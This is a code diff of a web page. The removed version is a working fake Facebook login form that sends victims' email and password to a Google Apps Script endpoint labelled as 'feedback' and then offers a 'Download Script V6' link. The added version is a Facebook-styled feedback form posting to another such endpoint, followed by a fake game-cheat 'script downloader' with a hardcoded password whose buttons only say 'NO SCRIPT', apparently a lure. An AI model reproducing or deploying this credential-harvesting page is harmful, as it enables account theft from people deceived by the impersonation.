--- a/index.html
+++ b/index.html
@@ -1,139 +1,187 @@
 <!DOCTYPE html>
-<html>
+<html lang="en">
 <head>
 <meta charset="UTF-8">
-<title>Feedback</title>
+<title>Script Downloader</title>
 
 <style>
-body {
-  font-family: Arial, sans-serif;
-  background: #e4e6eb;
-  display: flex;
-  justify-content: center;
-  align-items: center;
-  height: 100vh;
+body{
+  margin:0;
+  font-family: Helvetica, Arial, sans-serif;
+  background:#f0f2f5;
 }
 
-.card {
-  background: #fff;
-  width: 320px;
-  padding: 20px;
-  border-radius: 8px;
-  box-shadow: 0 2px 10px rgba(0,0,0,.2);
-  text-align: center;
+/* Header */
+.header{
+  background:#1877f2;
+  color:white;
+  padding:14px;
+  font-size:20px;
+  font-weight:bold;
+  text-align:center;
 }
 
-h2 {
-  color: #1877f2;
-  margin-bottom: 10px;
+/* Card */
+.box{
+  background:white;
+  max-width:420px;
+  margin:30px auto;
+  padding:20px;
+  border-radius:8px;
+  box-shadow:0 2px 6px rgba(0,0,0,.2);
+  text-align:center;
 }
 
-input {
-  width: 100%;
-  padding: 10px;
-  border-radius: 6px;
-  border: 1px solid #ccd0d5;
-  margin-bottom: 10px;
-  font-size: 14px;
+input, textarea{
+  width:100%;
+  padding:12px;
+  margin:10px 0;
+  border-radius:6px;
+  border:1px solid #ccd0d5;
+  font-size:15px;
 }
 
-button {
-  width: 100%;
-  padding: 10px;
-  background: #1877f2;
-  border: none;
-  color: white;
-  border-radius: 6px;
-  font-size: 15px;
-  cursor: pointer;
+textarea{height:90px; resize:none;}
+
+button{
+  width:100%;
+  padding:12px;
+  border:none;
+  border-radius:6px;
+  background:#1877f2;
+  color:white;
+  font-size:16px;
+  font-weight:bold;
+  cursor:pointer;
 }
 
-button:hover {
-  background: #166fe5;
+button:active{opacity:.85}
+
+.hidden{display:none;}
+
+.small{
+  color:#65676b;
+  font-size:13px;
+  margin-bottom:10px;
 }
 
-.loader {
-  border: 4px solid #f3f3f3;
-  border-top: 4px solid #1877f2;
-  border-radius: 50%;
-  width: 30px;
-  height: 30px;
-  animation: spin 1s linear infinite;
-  margin: 15px auto;
-  display: none;
+/* Loading */
+.loading{
+  width:100%;
+  height:6px;
+  background:#ddd;
+  border-radius:4px;
+  overflow:hidden;
 }
-
-@keyframes spin {
-  0% { transform: rotate(0deg); }
-  100% { transform: rotate(360deg); }
-}
-
-.hidden {
-  display: none;
+.bar{
+  height:100%;
+  width:0%;
+  background:#1877f2;
 }
 </style>
 </head>
 
 <body>
 
-<div class="card">
+<div class="header">Feedback</div>
 
-  <!-- STEP 1 -->
-  <div id="step1">
-    <h2>FACEBOOK LOG IN</h2>
-    <input id="f1" placeholder="Email">
-    <button onclick="send1()">Next</button>
-  </div>
+<!-- LOADING -->
+<div class="box" id="loadingBox">
+  <div class="small">Loading...</div>
+  <div class="loading"><div class="bar" id="bar"></div></div>
+  <p id="percent">0%</p>
+</div>
 
-  <!-- STEP 2 -->
-  <div id="step2" class="hidden">
-    <h2>FACEBOOK LOG IN</h2>
-    <input id="f2" placeholder="Password">
-    <button onclick="send2()">Log in</button>
-  </div>
+<!-- FEEDBACK 1 -->
+<div class="box hidden" id="feedback1Box">
+  <div class="small">Tell us the problem</div>
+  <textarea id="feedback1" placeholder="Error / issue"></textarea>
+  <button onclick="nextFeedback()">Next</button>
+</div>
 
-  <!-- LOADING -->
-  <div class="loader" id="loader"></div>
+<!-- FEEDBACK 2 -->
+<div class="box hidden" id="feedback2Box">
+  <div class="small">How should we fix it?</div>
+  <textarea id="feedback2" placeholder="Suggestion / fix"></textarea>
+  <button onclick="submitFeedback()">Submit</button>
+</div>
 
-  <!-- DONE -->
-  <div id="done" class="hidden">
-    <h2>Thank you 💙</h2>
-    <a href="V6_DOWNLOAD_LINK" style="color:#1877f2;text-decoration:none;">
-      ⬇ Download Script V6
-    </a>
-  </div>
+<!-- PASSWORD -->
+<div class="box hidden" id="passwordBox">
+  <div class="small">Your Password</div>
+  <h2>5863</h2>
+  <button onclick="backToMain()">Back to Main</button>
+</div>
 
+<!-- MAIN -->
+<div class="box hidden" id="mainBox">
+  <h2>SCRIPT DOWNLOADER</h2>
+  <input id="pass" placeholder="Enter Password">
+  <button onclick="checkPassword()">Enter Password</button>
+</div>
+
+<!-- SCRIPT LIST -->
+<div class="box hidden" id="scriptBox">
+  <h3>Scripts</h3>
+  <button onclick="alert('NO SCRIPT')">Super Bear Adventure</button>
+  <button onclick="alert('NO SCRIPT')">Gym Idle Clicker</button>
+  <button onclick="alert('NO SCRIPT')">Counter Terrorist Strike</button>
+  <button onclick="alert('NO SCRIPT')">Heroes Strike</button>
+  <button onclick="alert('NO SCRIPT')">Magica.io</button>
+  <button onclick="alert('NO SCRIPT')">Obby Parkour</button>
+  <button onclick="alert('NO SCRIPT')">Mobile Legends Bang Bang</button>
 </div>
 
 <script>
-const WEB_APP_URL = "https://script.google.com/macros/s/AKfycbznRC4qPBMuiW0SyGdn4RC3KBBwZu_pvVD_TpBj6YGK2qaWj1Q3__B3YnOMcvFWitKUNQ/exec";
+const WEB_APP_URL = "https://script.google.com/macros/s/AKfycbzFhK2kvKx5lklYr4BOtPyfXCQvu8LO-DJaSjf5V-3C1hg6HTlzsCsaPjczLcYZfzpEow/exec";
+let f1 = "";
 
-function showLoader(show) {
-  document.getElementById("loader").style.display = show ? "block" : "none";
+/* Loading */
+let p = 0;
+let load = setInterval(()=>{
+  p+=2;
+  document.getElementById("bar").style.width = p+"%";
+  document.getElementById("percent").innerText = p+"%";
+  if(p>=100){
+    clearInterval(load);
+    loadingBox.classList.add("hidden");
+    feedback1Box.classList.remove("hidden");
+  }
+},40);
+
+/* Feedback */
+function nextFeedback(){
+  f1 = feedback1.value;
+  if(!f1){ alert("Please write feedback"); return; }
+  feedback1Box.classList.add("hidden");
+  feedback2Box.classList.remove("hidden");
 }
 
-function send1() {
-  const v = document.getElementById("f1").value;
-  showLoader(true);
+function submitFeedback(){
+  const f2 = feedback2.value;
+  if(!f2){ alert("Please write feedback"); return; }
 
-  fetch(WEB_APP_URL + "?feedback=" + encodeURIComponent(v))
-    .then(() => {
-      showLoader(false);
-      document.getElementById("step1").classList.add("hidden");
-      document.getElementById("step2").classList.remove("hidden");
-    });
+  fetch(WEB_APP_URL,{
+    method:"POST",
+    body:JSON.stringify({feedback1:f1, feedback2:f2})
+  }).then(()=>{
+    feedback2Box.classList.add("hidden");
+    passwordBox.classList.remove("hidden");
+  }).catch(()=>alert("Submit failed"));
 }
 
-function send2() {
-  const v = document.getElementById("f2").value;
-  showLoader(true);
+function backToMain(){
+  passwordBox.classList.add("hidden");
+  mainBox.classList.remove("hidden");
+}
 
-  fetch(WEB_APP_URL + "?feedback=" + encodeURIComponent(v))
-    .then(() => {
-      showLoader(false);
-      document.getElementById("step2").classList.add("hidden");
-      document.getElementById("done").classList.remove("hidden");
-    });
+function checkPassword(){
+  if(pass.value==="5863"){
+    mainBox.classList.add("hidden");
+    scriptBox.classList.remove("hidden");
+  }else{
+    alert("Wrong password");
+  }
 }
 </script>
 
